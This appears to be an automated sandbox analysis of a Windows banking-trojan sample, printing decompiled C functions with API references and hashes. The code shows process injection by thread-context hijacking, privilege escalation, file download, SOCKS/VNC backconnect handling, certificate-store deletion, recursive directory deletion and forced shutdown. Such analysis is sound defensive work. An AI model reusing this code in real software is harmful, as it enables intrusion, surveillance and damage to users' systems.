    				_t51 = FindFirstFileW( &_v524,  &_v1116);
    				_v1128 = _t51;
    				if(_t51 != 0xffffffff) {
    					_t71 = _a8;
    					while(1) {
    						_t83 = 0;
    						if(_a20 != 0 && WaitForSingleObject(_a20, 0) != 0x102) {
    							break;
    						}
    						if(E00416E4B( &(_v1116.cFileName)) != 0) {
    							L23:
    							if(FindNextFileW(_v1128,  &_v1116) != 0) {
    								continue;
    							}
    							break;
    						}
    						_t60 = _v1116.dwFileAttributes & 0x00000010;
    						if(_t60 == 0 || (_t71 & 0x00000002) == 0) {
    							if(_t60 != _t83 || (_t71 & 0x00000004) == 0) {
    								goto L17;
    							} else {
    								goto L10;
    							}
    						} else {
    							L10:
    							if(_a4 <= _t83) {
    								L17:
    								if((_v1116.dwFileAttributes & 0x00000010) != 0 && (_t71 & 0x00000001) != 0 && E00417246( &(_v1116.cFileName),  &_v524, _v1124) != 0) {
    									_t103 = _a24;
    									if(_a24 != 0) {
    										Sleep(_a24);
    									}
    									E004170EA( &_v524, _v1120, _t103, _a4, _t71, _a12, _a16, _a20, _a24, _a28);
    								}
    								goto L23;
    							}
    							while(PathMatchSpecW( &(_v1116.cFileName),  *(_v1120 + _t83 * 4)) == 0) {
    								_t83 = _t83 + 1;
    								if(_t83 < _a4) {
    									continue;
    								}
    								goto L17;
    							}
    							_t68 = _a12(_a16);
    							__eflags = _t68;
    							if(_t68 == 0) {
    								break;
    							}
    							__eflags = _a28;
    							if(_a28 != 0) {
    								Sleep(_a28);
    							}
    							goto L17;
    						}
    					}
    					_t51 = FindClose(_v1128);
    				}
    			}

    APIs
      • Part of subcall function 00417246: PathCombineW.SHLWAPI(00405D8B,00405D8B,?,00405D8B,?,?), ref: 00417265
    • FindFirstFileW.KERNEL32(?,?,?,?,00000000,?,80000001), ref: 00417129
    • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00417150
    • PathMatchSpecW.SHLWAPI(?,?), ref: 0041719A
    • Sleep.KERNEL32(00000000), ref: 004171C7
    • Sleep.KERNEL32(00000000,?,?), ref: 004171F7
    • FindNextFileW.KERNEL32(?,?), ref: 00417225
    • FindClose.KERNEL32(?), ref: 00417237
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
    • String ID:
    • API String ID: 2348139788-0
    • Opcode ID: 244c1ca3ec9d188044de67639d68d8ecd5dca176ec41c65d72f172fe7c792a5a
    • Instruction ID: a53325d9b501d9e2584a95d6f72ca3c5641cd5b704c9dc2a96b84840a9c2b85b
    • Opcode Fuzzy Hash: 244c1ca3ec9d188044de67639d68d8ecd5dca176ec41c65d72f172fe7c792a5a
    • Instruction Fuzzy Hash: CE415F3100820AABCF21DF54CD44ADF7BB5FF48344F14492AF994922A1D739C9DACB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041308D(WCHAR* _a4) {
    				void* _v12;
    				intOrPtr _v16;
    				struct _TOKEN_PRIVILEGES _v28;
    				int _t23;
    
    				_t23 = 0;
    				if(OpenThreadToken(GetCurrentThread(), 0x20, 0,  &_v12) != 0 || OpenProcessToken(0xffffffff, 0x20,  &_v12) != 0) {
    					_v28.PrivilegeCount = 1;
    					_v16 = 2;
    					if(LookupPrivilegeValueW(_t23, _a4,  &(_v28.Privileges)) != 0 && AdjustTokenPrivileges(_v12, _t23,  &_v28, _t23, _t23, _t23) != 0 && GetLastError() == 0) {
    						_t23 = 1;
    					}
    					CloseHandle(_v12);
    					return _t23;
    				} else {
    					return 0;
    				}
    			}

    APIs
    • GetCurrentThread.KERNEL32 ref: 0041309D
    • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0041C599,SeTcbPrivilege), ref: 004130A4
    • OpenProcessToken.ADVAPI32(000000FF,00000020,0041C599,?,?,?,?,0041C599,SeTcbPrivilege), ref: 004130B6
    • LookupPrivilegeValueW.ADVAPI32(00000000,0041C599,?), ref: 004130DA
    • AdjustTokenPrivileges.ADVAPI32(0041C599,00000000,00000001,00000000,00000000,00000000), ref: 004130EF
    • GetLastError.KERNEL32 ref: 004130F9
    • CloseHandle.KERNEL32(0041C599), ref: 00413108
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Token$OpenThread$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessValue
    • String ID:
    • API String ID: 2724707430-0
    • Opcode ID: 13214aad1df67a814eb6fbe14b4250ab1e340ce23e1a7e3f06e1c727fc1f9093
    • Instruction ID: d39284f023ce2c939f220344915e2f30821d3e3f710d10412c709711af44d6d0
    • Opcode Fuzzy Hash: 13214aad1df67a814eb6fbe14b4250ab1e340ce23e1a7e3f06e1c727fc1f9093
    • Instruction Fuzzy Hash: EF011E75600208BFEB109FA5DD89EEFBFBCEB04745F004066F611F21A0E7748A849A39
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E00408DB8(void* __edx, void** _a4, void** _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32, intOrPtr _a36, intOrPtr _a40, void* _a44) {
    				struct _CONTEXT _v720;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t32;
    				void* _t36;
    				void* _t37;
    				void** _t45;
    				void* _t46;
    				void* _t47;
    				void** _t50;
    				void* _t52;
    				void* _t53;
    				signed int _t55;
    				void* _t65;
    
    				_t47 = __edx;
    				_t45 = _a4;
    				_t32 =  *0x422554(_t45, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44);
    				_a40 = _t32;
    				if(_t32 >= 0 && (_a32 & 0x00000001) != 0 && _t45 != 0 && _a8 != 0 && E00406473() != 0 && GetProcessId( *_t45) != 0) {
    					_t36 = E00406296(_t46, _t47, _t35);
    					_a44 = _t36;
    					_t63 = _t36;
    					if(_t36 != 0) {
    						_push(_t52);
    						_t37 = E00406388(_t46,  *_t45, _t52, _t63, _t36, 0);
    						_t50 = _a8;
    						_t53 = _t37;
    						_a32 = _t53;
    						_t55 = _t53 -  *0x422544 + E00406B06;
    						_v720.ContextFlags = 0x10003;
    						if(GetThreadContext( *_t50,  &_v720) == 0) {
    							L12:
    							VirtualFreeEx( *_t45, _a32, 0, 0x8000);
    						} else {
    							_t65 = _v720.Eip -  *0x42255c; // 0x77a2ba60
    							if(_t65 != 0) {
    								goto L12;
    							} else {
    								if(( *0x422530 & 0x00000010) != 0) {
    									_t55 = _t55 ^ _v720.Eax;
    								}
    								_v720.Eax = _t55;
    								_v720.ContextFlags = 0x10002;
    								if(SetThreadContext( *_t50,  &_v720) == 0) {
    									goto L12;
    								}
    							}
    						}
    						CloseHandle(_a44);
    					}
    				}
    				return _a40;
    			}

    APIs
    • NtCreateUserProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00408DE4
      • Part of subcall function 00406473: WaitForSingleObject.KERNEL32(00000000,0041D5FF,743C152E,00000002), ref: 0040647B
    • GetProcessId.KERNEL32(?), ref: 00408E20
      • Part of subcall function 00406296: CreateMutexW.KERNEL32(00422568,00000001,?,004227A8,7519F560,?,00000002,?,7519F560), ref: 004062E7
      • Part of subcall function 00406296: GetLastError.KERNEL32 ref: 004062F3
      • Part of subcall function 00406296: CloseHandle.KERNEL32(00000000), ref: 00406301
    • GetThreadContext.KERNEL32(00000000,?,00000000,00000000,?,?,00000000), ref: 00408E72
    • SetThreadContext.KERNEL32(00000000,00010003,?,?,00000000), ref: 00408EB2
    • VirtualFreeEx.KERNEL32(?,00000001,00000000,00008000,?,?,00000000), ref: 00408EC8
    • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00408ED1
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseContextCreateHandleProcessThread$ErrorFreeLastMutexObjectSingleUserVirtualWait
    • String ID:
    • API String ID: 1044471028-0
    • Opcode ID: 6cd64fc88610fa7c5df98b3670bf4007e06aac17af041047f674bb8b29e0d2e3
    • Instruction ID: cc393bde3a605ccd65a9f28b7d6fc14248cc6d3d8a760380cb6fd85c1d62b871
    • Opcode Fuzzy Hash: 6cd64fc88610fa7c5df98b3670bf4007e06aac17af041047f674bb8b29e0d2e3
    • Instruction Fuzzy Hash: F0315A3150021AABDF129F64CE48BDA7BB9AF08304F04816AFD49F22A1D775D864DF98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00413803(void* _a4, WCHAR* _a8, intOrPtr _a12, void* _a16) {
    				char _v5;
    				long _v12;
    				struct _OVERLAPPED* _v16;
    				void* _v20;
    				long _v24;
    				void* _t28;
    				long _t37;
    				void* _t41;
    
    				_v5 = 0;
    				_t41 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
    				if(_t41 == 0xffffffff) {
    					L15:
    					return _v5;
    				}
    				_t28 = E00411991(0x1000);
    				_v20 = _t28;
    				if(_t28 == 0) {
    					L13:
    					CloseHandle(_t41);
    					if(_v5 == 0) {
    						E00416D1C(_a8);
    					}
    					goto L15;
    				}
    				_v16 = 0;
    				while(_a16 == 0 || WaitForSingleObject(_a16, 0) == 0x102) {
    					if(InternetReadFile(_a4, _v20, 0x1000,  &_v12) == 0) {
    						break;
    					}
    					if(_v12 == 0) {
    						FlushFileBuffers(_t41);
    						_v5 = 1;
    						break;
    					}
    					if(WriteFile(_t41, _v20, _v12,  &_v24, 0) == 0) {
    						break;
    					}
    					_t37 = _v12;
    					if(_t37 != _v24) {
    						break;
    					}
    					_v16 = _v16 + _t37;
    					if(_v16 <= _a12) {
    						continue;
    					}
    					break;
    				}
    				E004119C1(_v20);
    				goto L13;
    			}

    APIs
    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,00000000,?,?,?,?,00000000), ref: 00413823
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 00413851
    • InternetReadFile.WININET(00001000,?,00001000,?), ref: 0041386D
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00413888
    • FlushFileBuffers.KERNEL32(00000000), ref: 004138A8
    • CloseHandle.KERNEL32(00000000), ref: 004138BB
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: File$BuffersCloseCreateFlushHandleInternetObjectReadSingleWaitWrite
    • String ID:
    • API String ID: 3509176705-0
    • Opcode ID: 2cd49833f24bb0a1dff1144cacaaa1f0ca22c210300cc3271a12d1a49f59b436
    • Instruction ID: 865450c59f5bbcd3c9aebacedb04134417acda3f689cbd4c4471300e088ba0a8
    • Opcode Fuzzy Hash: 2cd49833f24bb0a1dff1144cacaaa1f0ca22c210300cc3271a12d1a49f59b436
    • Instruction Fuzzy Hash: 98216071900149BFEF11AF94DC84BEE7BB5EB04312F1444AAF551B11A0C3798EC59B29
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CryptAcquireContextW.ADVAPI32(0041728D,00000000,00000000,00000001,F0000040,00000000,0041728D,?,00000030,?,?,?,004177A6,?), ref: 00412C7F
    • CryptCreateHash.ADVAPI32(00008003,00008003,00000000,00000000,?,?,?,004177A6,?), ref: 00412C97
    • CryptHashData.ADVAPI32(?,00000010), ref: 00412CB3
    • CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 00412CCB
    • CryptDestroyHash.ADVAPI32(?), ref: 00412CE2
    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,004177A6,?), ref: 00412CEC
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
    • String ID:
    • API String ID: 3186506766-0
    • Opcode ID: f6c96499aeac1828cf42449b75cbee90bb6f10f2b86170372dac768f02de4296
    • Instruction ID: 46d244a8a143b35931b169639559f22b60be7f6312723319923349c042e6472b
    • Opcode Fuzzy Hash: f6c96499aeac1828cf42449b75cbee90bb6f10f2b86170372dac768f02de4296
    • Instruction Fuzzy Hash: 9611277180024CBFEF119B94DE84EEE7B3DFB04344F004462F651E0160D7768EA5AB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E00404F00(void* __ecx, CHAR** _a4, signed int _a7) {
    				signed int _v6;
    				signed int _v8;
    				char _v9;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				char _v28;
    				short _v30;
    				intOrPtr _v36;
    				char _v44;
    				char _v304;
    				char _v788;
    				char _v792;
    				void* __edi;
    				void* __esi;
    				int _t68;
    				signed short _t70;
    				signed int _t80;
    				void* _t95;
    				signed int _t99;
    				void* _t102;
    				signed int _t108;
    				void* _t112;
    				CHAR** _t121;
    				signed int _t130;
    				intOrPtr* _t131;
    				intOrPtr* _t138;
    				signed int _t139;
    				void* _t141;
    
    				_t123 = __ecx;
    				E00411A74( &_v304,  &_v304, 0, 0x104);
    				_t121 = _a4;
    				if(lstrcmpiA( *_t121, ?str?) != 0) {
    					_t68 = lstrcmpiA( *_t121, "vnc");
    					__eflags = _t68;
    					if(_t68 != 0) {
    						_t70 = E00412040( *_t121, _t123, 0);
    						_t6 = _t70 - 1; // -1
    						_t123 = _t6;
    						__eflags = _t6 - 0xfffd;
    						if(_t6 > 0xfffd) {
    							L32:
    							E00415AC2( &_v304);
    							_a7 = 0;
    							if(_v304 <= 0) {
    								L34:
    								E004119C1( *_t121);
    								E004119C1(_t121[1]);
    								E004119C1(_t121[2]);
    								E00415194(_t121[3]);
    								E004119C1(_t121);
    								return 0;
    							} else {
    								goto L33;
    							}
    							do {
    								L33:
    								CloseHandle( *(_t141 + (_a7 & 0x000000ff) * 4 - 0x128));
    								_a7 = _a7 + 1;
    							} while (_a7 < _v304);
    							goto L34;
    						}
    						_t80 = _t70 & 0x0000ffff;
    						_v24 = _t80;
    						__eflags = _t80;
    						if(_t80 == 0) {
    							goto L32;
    						}
    						L6:
    						_t130 = E00414A4A(E00412040(_t121[2], _t123, 0), _t123, _t121[1]);
    						_v16 = _t130;
    						if(_t130 == 0xffffffff) {
    							goto L32;
    						}
    						E00414DBC(_t123, _t130);
    						E00414D7A(_t130);
    						_t89 = E00412818(E00406619(_t123,  &_v792) | 0xffffffff,  &_v788,  &_v44);
    						_t144 = _t89;
    						if(_t89 == 0) {
    							L31:
    							E00414D64(_t89, _t130);
    							goto L32;
    						}
    						_v9 = E00418059( &_v788, _v36, _t144, _t130, 1, _v44);
    						_t89 = E00412806( &_v44);
    						if(_v9 == 0) {
    							goto L31;
    						}
    						_t89 = E00414C71(0,  &_v16, 0, 0);
    						_t130 = _v16;
    						if(_t89 != _t130) {
    							goto L31;
    						}
    						while(1) {
    							_push(0x7530);
    							_push( &_v8);
    							_t95 = 4;
    							if(E00414974(_t95, _t130) == 0 || _v8 <= 4) {
    								break;
    							}
    							_t138 = E00411991(_v8 & 0x0000ffff);
    							_push(0x7530);
    							if(_t138 == 0) {
    								_t127 = _v8 & 0x0000ffff;
    								_t99 = (_v6 & 0x0000ffff) + (_v8 & 0x0000ffff) - 4;
    								L29:
    								_push(_t99);
    								_push(_t130);
    								_t89 = E004149BC(_t127);
    								break;
    							}
    							_push(_t138);
    							_t127 = _t130;
    							_t102 = E00414974((_v8 & 0x0000ffff) - 4, _t130);
    							_push(_t138);
    							if(_t102 == 0) {
    								L35:
    								_t89 = E004119C1();
    								break;
    							}
    							_v30 = _v6;
    							_v28 =  *_t138;
    							E004119C1();
    							if(_v6 != 0) {
    								_t139 = E00411991(_v6 & 0x0000ffff);
    								_t99 = _v6 & 0x0000ffff;
    								_push(0x7530);
    								__eflags = _t139;
    								if(_t139 == 0) {
    									goto L29;
    								}
    								_push(_t139);
    								_t127 = _t130;
    								_t108 = E00414974(_t99, _t130);
    								__eflags = _t108;
    								if(_t108 == 0) {
    									_push(_t139);
    									goto L35;
    								}
    								_v20 = _t139;
    								L20:
    								if(_v28 == 2 && _v30 == 4) {
    									_t112 = 0xc;
    									_t131 = E00411991(_t112);
    									if(_t131 != 0) {
    										 *_t131 = _a4;
    										 *((intOrPtr*)(_t131 + 4)) = _v24;
    										 *((intOrPtr*)(_t131 + 8)) =  *_v20;
    										if(E00415A7D( &_v304, 0x20000, E00404C77, _t131) == 0) {
    											E004119C1(_t131);
    										}
    									}
    									E00415A2B(_t127,  &_v304);
    								}
    								E004119C1(_v20);
    								_t89 = E00414C71(0,  &_v16, 0, 0);
    								_t130 = _v16;
    								if(_t89 == _t130) {
    									continue;
    								} else {
    									break;
    								}
    							}
    							_v20 = _v20 & 0x00000000;
    							goto L20;
    						}
    						_t121 = _a4;
    						goto L31;
    					}
    					_v24 = 0xfffffffe;
    					goto L6;
    				}
    				_v24 = _v24 | 0xffffffff;
    				goto L6;
    			}

    APIs
    • lstrcmpiA.KERNEL32(?,socks,?,00000000,00000104), ref: 00404F2F
    • lstrcmpiA.KERNEL32(?,vnc), ref: 00404F42
    • CloseHandle.KERNEL32(?), ref: 0040515F
      • Part of subcall function 00415A7D: SetLastError.KERNEL32(0000009B,00406914,00000000,0040A2E5,00000000,00422428,00000000,00000104,7519F560,00000000), ref: 00415A87
      • Part of subcall function 004119C1: HeapFree.KERNEL32(00000000,00000000,004131B8,00000000,?,?,?,00405C4E,00000000,00406128), ref: 004119D4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: lstrcmpi$CloseErrorFreeHandleHeapLast
    • String ID: socks$vnc
    • API String ID: 3305036421-270151703
    • Opcode ID: 42aac4decd2699af289818a9dfe128f835b9f118a0ec79afc61e422d361caaf4
    • Instruction ID: 988e49d09041c5c484af7f334a99a86d297549a2af317fb943c67cef3be06b51
    • Opcode Fuzzy Hash: 42aac4decd2699af289818a9dfe128f835b9f118a0ec79afc61e422d361caaf4
    • Instruction Fuzzy Hash: 0371E3B0900119AACF11AB61C851BFF77B5AF45318F14416BF990BB2D2D73C8E81DBA9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041702F(WCHAR* __ecx, void* __eflags) {
    				struct _WIN32_FIND_DATAW _v596;
    				short _v1116;
    				WCHAR* _t38;
    				void* _t42;
    
    				_t38 = __ecx;
    				if(E00417246("*",  &_v1116, __ecx) == 0) {
    					L9:
    					SetFileAttributesW(_t38, 0x80);
    					return RemoveDirectoryW(_t38) & 0xffffff00 | _t19 != 0x00000000;
    				}
    				_t42 = FindFirstFileW( &_v1116,  &_v596);
    				if(_t42 == 0xffffffff) {
    					goto L9;
    				} else {
    					goto L2;
    				}
    				do {
    					L2:
    					if(E00416E4B( &(_v596.cFileName)) == 0 && E00417246( &(_v596.cFileName),  &_v1116, _t38) != 0) {
    						_t51 = _v596.dwFileAttributes & 0x00000010;
    						if((_v596.dwFileAttributes & 0x00000010) == 0) {
    							E00416D1C( &_v1116);
    						} else {
    							E0041702F( &_v1116, _t51);
    						}
    					}
    				} while (FindNextFileW(_t42,  &_v596) != 0);
    				FindClose(_t42);
    				goto L9;
    			}

    APIs
      • Part of subcall function 00417246: PathCombineW.SHLWAPI(00405D8B,00405D8B,?,00405D8B,?,?), ref: 00417265
    • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00417060
    • FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 004170BB
    • FindClose.KERNEL32(00000000,?,00000000), ref: 004170C6
    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000000), ref: 004170D2
    • RemoveDirectoryW.KERNEL32(?,?,00000000), ref: 004170D9
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: FileFind$AttributesCloseCombineDirectoryFirstNextPathRemove
    • String ID:
    • API String ID: 765042924-0
    • Opcode ID: e1c2cf4ed822b666a53f6116dbe028b8f9a9dd249274b5cef5d43ffe2d23dc26
    • Instruction ID: b5b67577d1f55d0c6655d1032714e5d4f8981eee0e93925d4e6b35615e7dd0dd
    • Opcode Fuzzy Hash: e1c2cf4ed822b666a53f6116dbe028b8f9a9dd249274b5cef5d43ffe2d23dc26
    • Instruction Fuzzy Hash: A311B6320083045AC720EB64DC49ADB7BFC9F49314F04462FB995D3190DB789989865A
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CertOpenSystemStoreW.CRYPT32(00000000,00403408), ref: 0040C866
    • CertDuplicateCertificateContext.CRYPT32(00000000), ref: 0040C87F
    • CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,00406A76), ref: 0040C88A
    • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 0040C892
    • CertCloseStore.CRYPT32(00000000,00000000), ref: 0040C89E
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Cert$Store$Certificate$CertificatesCloseContextDeleteDuplicateEnumFromOpenSystem
    • String ID:
    • API String ID: 1842529175-0
    • Opcode ID: a50def23fd487ae4cdc798def6369d1f485d2fa0676be072f0d98902bc9cc757
    • Instruction ID: 849acb84cbcaa08620e1f90765fdb4e8be935ed35cb3fefef8b7c6d1ebceab6c
    • Opcode Fuzzy Hash: a50def23fd487ae4cdc798def6369d1f485d2fa0676be072f0d98902bc9cc757
    • Instruction Fuzzy Hash: DCF0A032281215AAD62127755E58FAB7B5CDB42B92B084233FA88F22A09E38C841856C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E0040A8D1() {
    				signed int _v124;
    				signed char _t12;
    				unsigned int _t15;
    				void* _t23;
    				void* _t24;
    
    				_t12 =  *0x422a6c; // 0x0
    				if((_t12 & 0x00000010) == 0) {
    					__eflags = _t12 & 0x00000008;
    					if(__eflags != 0) {
    						E0041CF1D(_t23, _t24, __eflags);
    						_t12 =  *0x422a6c; // 0x0
    					}
    					__eflags = _t12 & 0x00000003;
    					if((_t12 & 0x00000003) == 0) {
    						__eflags = _t12 & 0x00000004;
    						if((_t12 & 0x00000004) != 0) {
    							goto L8;
    						}
    						goto L9;
    					} else {
    						E0041308D(L"SeShutdownPrivilege");
    						_t15 =  *0x422a6c; // 0x0
    						__eflags = 0;
    						__imp__InitiateSystemShutdownExW(0, 0, 0, 1, _t15 >> 0x00000001 & 0x00000001, 0x80000000);
    						return 0;
    					}
    				} else {
    					_t12 = E00419CE5( &_v124);
    					if(_t12 != 0) {
    						_v124 = _v124 | 0x00000020;
    						 *0x422530 =  *0x422530 | 0x00000010;
    						E00419D3D( &_v124);
    						L8:
    						return ExitWindowsEx(0x14, 0x80000000);
    					}
    					L9:
    					return _t12;
    				}
    			}

    APIs
    • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000000,80000000), ref: 0040A936
      • Part of subcall function 00419CE5: CreateMutexW.KERNEL32(00422568,00000000,00423D10,?,?,0041D677,?,?,?,743C152E,00000002), ref: 00419D0B
    • ExitWindowsEx.USER32 ref: 0040A949
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CreateExitInitiateMutexShutdownSystemWindows
    • String ID: $SeShutdownPrivilege
    • API String ID: 3829579691-2253681161
    • Opcode ID: 41b3d583e88ac20afeee7f1fd9a8a54d78279eed80a24d85a5e97d91cad76904
    • Instruction ID: 3750101232593ca24a29cf56d1ca985bb666f9d05db0c1e7de212708b9366d22
    • Opcode Fuzzy Hash: 41b3d583e88ac20afeee7f1fd9a8a54d78279eed80a24d85a5e97d91cad76904
    • Instruction Fuzzy Hash: 6AF0F97170030469EE2097B45D4AFFA3B6C9B00748F50043AF991F25F2D7789A528A6D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 99%
    			E0041848E(void* __edx, intOrPtr _a4) {
    				signed int _v12;
    				int _v16;
    				void* _v20;
    				int _v24;
    				signed int _v28;
    				int _v32;
    				char _v36;
    				signed int _v40;
    				signed int _v44;
    				signed int _v48;
    				signed int _v52;
    				intOrPtr _v56;
    				signed int _v60;
    				signed int _v64;
    				intOrPtr _v74;
    				intOrPtr _v78;
    				char _v80;
    				struct _SYSTEMTIME _v96;
    				char _v112;
    				short _v184;
    				short _v288;
    				void* __ebx;
    				void* __esi;
    				signed int _t127;
    				signed int _t131;
    				signed int _t132;
    				signed int _t133;
    				signed int _t134;
    				signed int _t140;
    				signed int _t142;
    				signed int _t143;
    				signed int _t151;
    				signed int _t155;
    				signed int _t159;
    				signed char _t163;
    				signed int _t167;
    				signed int _t176;
    				signed int _t177;
    				signed int _t186;
    				long _t191;
    				long _t195;
    				signed int _t201;
    				void* _t202;
    				signed int _t203;
    				signed int _t208;
    				signed int _t211;
    				signed int _t212;
    				signed int _t219;
    				short* _t230;
    				signed int _t238;
    				intOrPtr _t239;
    				void* _t244;
    
    				_t239 = _a4;
    				_t126 =  *((intOrPtr*)(_t239 + 0x40));
    				if( *((intOrPtr*)(_t239 + 0x40)) != 0) {
    					_t127 = E0041752D( &_v12, __edx, __eflags, _t126, 0x4e27, 0x10000000);
    					 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
    					 *(_t239 + 0x38) =  *(_t239 + 0x38) & 0x00000000;
    					_t238 = _t127;
    					_v64 = _t238;
    					__eflags = _t238;
    					if(_t238 == 0) {
    						L55:
    						E004119C1(_v64);
    						__eflags = 0 -  *(_t239 + 0x3c);
    						asm("sbb eax, eax");
    						return  ~0x00000000;
    					}
    					_t131 = _v12;
    					__eflags = _t131 - 0x10;
    					if(_t131 <= 0x10) {
    						goto L55;
    					}
    					__eflags =  *((char*)(_t239 + 0x18)) - 1;
    					_v16 = 1;
    					_t132 = _t131 + _t238;
    					__eflags = _t132;
    					_v28 = ((0 |  *((char*)(_t239 + 0x18)) != 0x00000001) - 0x00000001 & 0xffffffe0) + 0x00000040 & 0x0000ffff;
    					_v12 = _t132;
    					while(1) {
    						_t133 =  *(_t238 + 2) & 0x0000ffff;
    						__eflags = _t133 - 0x10;
    						if(_t133 < 0x10) {
    							goto L55;
    						}
    						_t219 =  *(_t238 + 4) & 0x0000ffff;
    						__eflags = _t219 - _t133;
    						if(_t219 >= _t133) {
    							goto L55;
    						}
    						__eflags =  *(_t238 + 6) - _t133;
    						if( *(_t238 + 6) >= _t133) {
    							goto L55;
    						}
    						__eflags =  *(_t238 + 8) - _t133;
    						if( *(_t238 + 8) >= _t133) {
    							goto L55;
    						}
    						__eflags =  *(_t238 + 0xa) - _t133;
    						if( *(_t238 + 0xa) >= _t133) {
    							goto L55;
    						}
    						__eflags =  *(_t238 + 0xc) - _t133;
    						if( *(_t238 + 0xc) >= _t133) {
    							goto L55;
    						}
    						__eflags =  *(_t238 + 0xe) - _t133;
    						if( *(_t238 + 0xe) >= _t133) {
    							goto L55;
    						}
    						_t134 =  *_t238 & 0x0000ffff;
    						_t208 = _t134 >> 0x00000009 & 0x00000008;
    						_t220 = _t238 + _t219;
    						__eflags = (_t134 & _v28) - _v28;
    						if((_t134 & _v28) != _v28) {
    							L48:
    							_t238 = _t238 + ( *(_t238 + 2) & 0x0000ffff);
    							_t102 = _t238 + 0x10; // 0x10
    							__eflags = _t102 - _v12;
